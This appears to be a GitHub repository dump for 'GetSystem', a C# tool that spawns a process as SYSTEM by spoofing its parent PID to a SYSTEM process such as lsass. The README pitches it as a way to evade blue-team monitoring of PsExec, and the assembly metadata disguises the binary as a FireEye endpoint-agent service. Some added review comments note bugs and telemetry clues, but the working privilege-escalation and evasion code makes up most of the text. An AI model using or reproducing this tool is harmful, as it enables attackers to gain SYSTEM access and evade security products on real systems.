├── BerlinDefence.cs
├── GetSystem.PNG
├── GetSystem.csproj
├── GetSystem.csproj.user
├── GetSystem.sln
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── README.md
├── app.config
└── bin
└── Release
├── GetSystem.exe
├── GetSystem.exe.config
└── GetSystem.pdb
/BerlinDefence.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace GetSystem
5 | {
class IamYourDaddy
{
    // ---- Win32 imports --------------------------------------------------------
    // NOTE(review): no CharSet is given on this import, so it binds to the ANSI
    // entry point, while STARTUPINFO/STARTUPINFOEX below are declared
    // CharSet.Unicode. Run leaves every string field of STARTUPINFO null, which
    // presumably masks the mismatch — confirm before relying on those fields.
    [DllImport("kernel32.dll")]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    // Returns IntPtr.Zero on failure (last error set); Run does not check for that.
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);

    // Declared but not called anywhere in this file.
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern UInt32 WaitForSingleObject(IntPtr handle, UInt32 milliseconds);

    // Writes one attribute (Run uses PROC_THREAD_ATTRIBUTE_PARENT_PROCESS) into an
    // already initialized attribute list. Its return value is ignored in Run.
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);

    // Two-call pattern: with lpAttributeList == IntPtr.Zero it only reports the
    // required buffer size through lpSize; the second call initializes the buffer.
    // The matching DeleteProcThreadAttributeList is not declared in this file.
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);

    // Declared but not called anywhere in this file.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool SetHandleInformation(IntPtr hObject, HANDLE_FLAGS dwMask, HANDLE_FLAGS dwFlags);

    // Declared but not called anywhere in this file — none of the handles Run
    // obtains (parentHandle, pInfo.hProcess, pInfo.hThread) are ever closed.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    // Declared but not called anywhere in this file.
    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool DuplicateHandle(IntPtr hSourceProcessHandle, IntPtr hSourceHandle, IntPtr hTargetProcessHandle, ref IntPtr lpTargetHandle, uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);

    /// <summary>
    /// Launches binaryPath so that the new process records parentProcessId as its
    /// parent, via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS extended startup
    /// attribute. For anyone reading process-tree telemetry: the parent recorded
    /// for the child is the supplied PID, not the process that ran this code;
    /// sources that log the actual creator separately are the way to see through it.
    /// </summary>
    /// <param name="parentProcessId">PID opened with CreateProcess | DuplicateHandle access and installed as the parent.</param>
    /// <param name="binaryPath">Passed as lpApplicationName; lpCommandLine and lpCurrentDirectory are null.</param>
    /// <remarks>
    /// Review notes, all visible in the body below:
    /// - the return values of both InitializeProcThreadAttributeList calls,
    ///   OpenProcess, UpdateProcThreadAttribute and CreateProcess (ret) are never
    ///   inspected, so a failed OpenProcess writes IntPtr.Zero into the attribute
    ///   and execution simply continues;
    /// - parentHandle and pInfo.hProcess/hThread are never closed, and lpValueProc
    ///   and siEx.lpAttributeList are never freed;
    /// - siEx.StartupInfo.cb is never set (the assignment is commented out);
    /// - hSourceProcessHandle and stringPid are assigned and never read.
    /// </remarks>
    public static void Run(int parentProcessId, string binaryPath)
    {
        // STARTUPINFOEX members
        const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;

        // STARTUPINFO members (dwFlags and wShowWindow)
        //const int STARTF_USESTDHANDLES = 0x00000100;
        //const int STARTF_USESHOWWINDOW = 0x00000001;
        //const short SW_HIDE = 0x0000;

        // dwCreationFlags
        const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
        const uint CREATE_NEW_CONSOLE = 0x00000010;

        var pInfo = new PROCESS_INFORMATION();
        var siEx = new STARTUPINFOEX();

        //siEx.StartupInfo.cb = Marshal.SizeOf(siEx);
        IntPtr lpValueProc = IntPtr.Zero;
        IntPtr hSourceProcessHandle = IntPtr.Zero; // assigned, never used
        var lpSize = IntPtr.Zero;

        // Size query with a null list, allocate, then initialize for one attribute.
        // Neither call's result is checked.
        InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
        siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
        InitializeProcThreadAttributeList(siEx.lpAttributeList, 1, 0, ref lpSize);

        // Unchecked: IntPtr.Zero here means the PID could not be opened with this access.
        IntPtr parentHandle = OpenProcess(ProcessAccessFlags.CreateProcess | ProcessAccessFlags.DuplicateHandle, false, parentProcessId);

        // The attribute value is the HANDLE itself, so the buffer is one pointer wide
        // and cbSize below is IntPtr.Size.
        lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
        Marshal.WriteIntPtr(lpValueProc, parentHandle);

        UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);

        //siEx.StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        //siEx.StartupInfo.wShowWindow = SW_HIDE;

        // Default security descriptors (lpSecurityDescriptor stays null); only nLength is filled in.
        var ps = new SECURITY_ATTRIBUTES();
        var ts = new SECURITY_ATTRIBUTES();
        ps.nLength = Marshal.SizeOf(ps);
        ts.nLength = Marshal.SizeOf(ts);
        // EXTENDED_STARTUPINFO_PRESENT tells CreateProcess that siEx carries an attribute list.
        bool ret = CreateProcess(binaryPath, null, ref ps, ref ts, true, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref siEx, out pInfo);
        String stringPid = pInfo.dwProcessId.ToString(); // never read

    }

    // Native STARTUPINFOEX: a STARTUPINFO followed by the attribute-list pointer.
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFOEX
    {
        public STARTUPINFO StartupInfo;
        public IntPtr lpAttributeList;
    }

    // Native STARTUPINFO. Run never assigns any of these fields (cb included).
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public Int32 cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public Int32 dwX;
        public Int32 dwY;
        public Int32 dwXSize;
        public Int32 dwYSize;
        public Int32 dwXCountChars;
        public Int32 dwYCountChars;
        public Int32 dwFillAttribute;
        public Int32 dwFlags;
        public Int16 wShowWindow;
        public Int16 cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    // Filled by CreateProcess. hProcess/hThread are kernel handles the caller owns;
    // Run does not close them.
    [StructLayout(LayoutKind.Sequential)]
    internal struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }

    // Native SECURITY_ATTRIBUTES; Run only sets nLength.
    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr lpSecurityDescriptor;
        [MarshalAs(UnmanagedType.Bool)]
        public bool bInheritHandle;
    }

    // PROCESS_* access rights for OpenProcess. Run requests CreateProcess | DuplicateHandle.
    [Flags]
    public enum ProcessAccessFlags : uint
    {
        All = 0x001F0FFF,
        Terminate = 0x00000001,
        CreateThread = 0x00000002,
        VirtualMemoryOperation = 0x00000008,
        VirtualMemoryRead = 0x00000010,
        VirtualMemoryWrite = 0x00000020,
        DuplicateHandle = 0x00000040,
        CreateProcess = 0x000000080, // extra leading zero is cosmetic; the value is 0x80
        SetQuota = 0x00000100,
        SetInformation = 0x00000200,
        QueryInformation = 0x00000400,
        QueryLimitedInformation = 0x00001000,
        Synchronize = 0x00100000
    }

    // Flags for SetHandleInformation, which this file declares but never calls.
    [Flags]
    enum HANDLE_FLAGS : uint
    {
        None = 0,
        INHERIT = 1,
        PROTECT_FROM_CLOSE = 2
    }
}
155 | }
156 |
--------------------------------------------------------------------------------
/GetSystem.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/py7hagoras/GetSystem/cb42e8ca23876f5eb0046e583d320dea353d9f8b/GetSystem.PNG
--------------------------------------------------------------------------------
/GetSystem.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}
8 | WinExe
9 | GetSystem
10 | GetSystem
11 | v4.0
12 | 512
13 |
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 | true
36 | bin\x86\Debug\
37 | DEBUG;TRACE
38 | full
39 | x86
40 | prompt
41 | MinimumRecommendedRules.ruleset
42 |
43 |
44 | bin\x86\Release\
45 | TRACE
46 | true
47 | pdbonly
48 | x86
49 | prompt
50 | MinimumRecommendedRules.ruleset
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
--------------------------------------------------------------------------------
/GetSystem.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\Windows\System32\cmd.exe lsass
5 |
6 |
--------------------------------------------------------------------------------
/GetSystem.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27703.2035
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GetSystem", "GetSystem.csproj", "{629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}.Debug|x64.ActiveCfg = Debug|Any CPU
15 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}.Debug|x64.Build.0 = Debug|Any CPU
16 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}.Release|x64.ActiveCfg = Release|Any CPU
17 | {629F86E6-44FE-4C9C-B043-1C9B64BE6D5A}.Release|x64.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {AA8E5DF5-41A2-4B82-A421-DCDD921A5D20}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
1 | using System.Diagnostics;
2 |
3 | namespace GetSystem
4 | {
class Program
{
    /// <summary>
    /// Entry point. Expects two positional arguments: args[0] is the path handed to
    /// IamYourDaddy.Run as the binary to launch, args[1] is the process name (as
    /// accepted by Process.GetProcessesByName) whose first match supplies the
    /// parent PID. Neither the argument count nor an empty match list is checked;
    /// both cases surface as an IndexOutOfRangeException.
    /// </summary>
    static void Main(string[] args)
    {
        var target = args[0];
        var spoofName = args[1];

        var matches = Process.GetProcessesByName(spoofName);
        var ppid = matches[0].Id;

        IamYourDaddy.Run(ppid, target);
    }
}
23 | }
24 |
--------------------------------------------------------------------------------
/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
// Review note: the title, description and product strings below name the
// FireEye xagt endpoint agent, which this project (GetSystem, per the csproj,
// solution and namespace) is not. Version-resource metadata is self-declared;
// when triaging a binary, compare these strings against its signature, path
// and hash rather than taking them at face value.
[assembly: AssemblyTitle("FireEye xagt")]
[assembly: AssemblyDescription("FireEye xagt notification service")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("FireEye xagt")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("629f86e6-44fe-4c9c-b043-1c9b64be6d5a")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # GetSystem
2 | This is a C# implementation for launching a process/executable as NT AUTHORITY\SYSTEM. This is achieved through parent process ID (PPID) spoofing, using almost any SYSTEM process as the parent. It helps avoid the use of PsExec, which is closely monitored by blue teams.
3 |
4 | # Usage:
5 |
6 | `GetSystem.exe <path-to-executable> <process-name>`
7 |
8 | GetSystem.exe C:\Windows\System32\cmd.exe lsass
9 |
10 | 
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/bin/Release/GetSystem.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/py7hagoras/GetSystem/cb42e8ca23876f5eb0046e583d320dea353d9f8b/bin/Release/GetSystem.exe
--------------------------------------------------------------------------------
/bin/Release/GetSystem.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/bin/Release/GetSystem.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/py7hagoras/GetSystem/cb42e8ca23876f5eb0046e583d320dea353d9f8b/bin/Release/GetSystem.pdb
--------------------------------------------------------------------------------